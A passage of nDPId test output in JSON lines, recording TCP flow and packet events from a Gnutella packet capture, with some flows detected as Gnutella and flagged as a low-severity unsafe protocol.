-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":68109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68109,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vGxAAIAGN8kKAAIPAST5W8Q1\/ZgxDGGiAAAAAIAC+vAZFAAAAgQFtAEDAwgBAQQC"} -00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68110,"flow_last_seen":68110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68110,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":50230,"dst_port":17296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":68110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0BKBAAIAGOe0KAAIPSQNnJcQ2Q5DEXLK5AAAAAIAC+vA5CwAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68110,"flow_last_seen":68110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68110,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.68.138.207","src_port":50231,"dst_port":45079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":68110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZZlAAIAGsggKAAIPTESKz8Q3sBfW5xLuAAAAAIAC+vAy2AAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":68170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68170,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0k7pAAIAGcS8KAAIPJOnE4sQsDuwTBJqfAAAAAIAC+vD9iAAAAgQFtAEDAwgBAQQC"} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":68368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":68368,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAqgAAEAGVIJ08aKiCgACDz09xDIAcUgB9bSpG2AS\/\/+LwQAAAgQFtA=="} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":68368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":68368,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobmNAAIAGaMoKAAIPdPGiosQyPT31tKkbAHFIAlAQ+vCojQAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":68108,"flow_last_seen":68372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":68372,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":68425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":68425,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAqoAAP8GHcZv8R9gCgACDzgwxDQAAAAAU1SN+lAUAAA2vQAA"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":68935,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68935,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KIpAAIAGNtoKAAIPb\/EfYMQ0ODBTVI35AAAAAIAC+vD7DAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdpAAIAGUVsKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8NAAIAGrlMKAAIPcfxWosQp1q4KULlcAAAAAIAC+vBA7QAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FThAAIAG3SkKAAIPUMGrksQm0jCYt6bIAAAAAIAC+vCV5QAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EU9AAIAGi6AKAAIPWmf3XsQq5qXgntCpAAAAAIAC+vC6MQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Co1AAIAGJkcKAAIPfPRA7cQnEmB1c07JAAAAAIAC+vAPawAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":69092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gY9AAIAGBqAKAAIPwXmlDMQr2FBBRhZnAAAAAIAC+vANYQAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69141,"flow_last_seen":69141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69141,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":69141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69141,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0LcBAAIAGF3gKAAIPtpvy4cQ4Otw6vMh+AAAAAIAC+vC8QwAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69141,"flow_last_seen":69141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69141,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":50233,"dst_port":12854,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":69141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69141,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01LRAAIAGCWgKAAIPAaMO9sQ5MjZr2Fv\/AAAAAIAC+vCZMAAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.189.28.17","src_port":50234,"dst_port":16269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VPxAAIAGOusKAAIPQr0cEcQ6P42S8gLxAAAAAIAC+vBvlwAAAgQFtAEDAwgBAQQC"} -00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AgNAAIAGSRQKAAIPLVh2RsQ7GvpGaqL3AAAAAIAC+vD72gAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Z6pAAIAGohwKAAIPXR2H0cQ8GMo64wwuAAAAAIAC+vBfCgAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.123.202.175","src_port":50237,"dst_port":37910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lydAAIAGNGMKAAIPWHvKr8Q9lBZfEvXQAAAAAIAC+vCXrgAAAgQFtAEDAwgBAQQC"} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":69169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69169,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAq8AAEAGhyBdHYfRCgACDxjKxDwAczwBOuMML2AS\/\/9GjAAAAgQFtA=="} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":69169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69169,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoZ6tAAIAGoicKAAIPXR2H0cQ8GMo64wwvAHM8AlAQ+vBjWAAA"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69174,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":69174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":69182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69182,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArEAAEAGyG4tWHZGCgACDxr6xDsAdDYBRmqi+GAS\/\/\/pWwAAAgQFtA=="} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":69182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69182,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoAgRAAIAGSR8KAAIPLVh2RsQ7GvpGaqL4AHQ2AlAQ+vAGKAAA"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":69182,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArgAAEAG3qdZSzQTCgACD7O6xBEAXroBd2GZhGAS\/\/+7lwAAAgQFtA=="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArkAAEAG56stQVcYCgACDz9JxBAAXcABhPHErWAS\/\/\/6VgAAAgQFtA=="} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAroAAEAG+PjPJqPkCgACDxp6xA8AYK4B6qFHeGAS\/\/9Z9wAAAgQFtA=="} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArsAAEAG2+NQjD+TCgACD3NpxA4AX7QBeWsMs2AS\/\/+J8QAAAgQFtA=="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":69360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArwAAEAGwoS2m\/LhCgACDzrcxDgAdioBOrzIf2AS\/\/+1wgAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69360,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoLcFAAIAGF4MKAAIPtpvy4cQ4Otw6vMh\/AHYqAlAQ+vDSjgAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69141,"flow_last_seen":69361,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":69361,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UtFAAIAGDgYKAAIPTn0\/YcQwGMq9KdLlAAAAAIAC+vBtKAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0faJAAIAGiKUKAAIPO2itBcQtwyRMUgplAAAAAIAC+vChmQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0R01AAIAGN+QKAAIPdqf43MQv9oQzn2SqAAAAAIAC+vCljgAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+zdAAIAGNBgKAAIPbdJRk8QxYOCX52ZFAAAAAIAC+vCFbAAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":70170,"flow_last_seen":70170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":70170,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.41.253","src_port":50238,"dst_port":59144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":70170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70170,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KcZAAIAGHhgKAAIPfNop\/cQ+5wgF3IcnAAAAAIAC+vCI7gAAAgQFtAEDAwgBAQQC"} -00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":70171,"flow_last_seen":70171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":70171,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"112.105.52.2","src_port":50239,"dst_port":6384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 